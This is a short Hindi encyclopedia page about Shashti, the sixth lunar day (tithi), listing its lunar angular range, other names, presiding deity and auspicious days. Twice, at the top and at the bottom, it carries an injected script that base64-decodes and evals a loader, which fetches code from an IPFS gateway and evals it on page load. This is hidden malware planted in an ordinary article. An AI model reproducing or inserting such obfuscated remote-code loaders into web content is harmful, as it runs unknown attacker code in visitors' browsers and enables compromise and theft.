षष्टी

ब्रज डिस्कवरी, एक मुक्त ज्ञानकोष से
नेविगेशन पर जाएँ खोज पर जाएँ

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

षष्टी / Shashti

  • सूर्य से चन्द्र का अन्तर जब तक 61° से 72° तक होता है, तब तक शुक्ल पक्ष की षष्टी तथा 241° से 252° की समाप्ति तक कृष्ण षष्टी रहती है।
  • यह ‘छट्ठी, छठी तथा छट’ भी कहलाती है।
  • इसके स्वामी स्कन्द (कार्तिकेय) हैं।
  • इसका विशेष नाम ‘कीर्ति’ हैं।
  • षष्टी रविवार एवं मंगलवार के दिन मृत्युदा और शुक्रवार के दिन सिद्धिदा होती है।
  • माघ कृष्ण पक्ष में यह तिथि शून्य होती है।
  • षष्टी तिथि की सामान्य संज्ञा ‘नन्दा’ है।
  • षष्टी तिथि की दिशा पश्चिम है।
  • कृष्ण पक्ष की षष्टी को शिवपूजनादि अशुभ तथा शुक्ल पक्ष षष्टी को शुभ होता है।
  • यह चन्द्रमा की छठी कला है और इसका अमृत वासव (इन्द्र) पीते हैं।

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>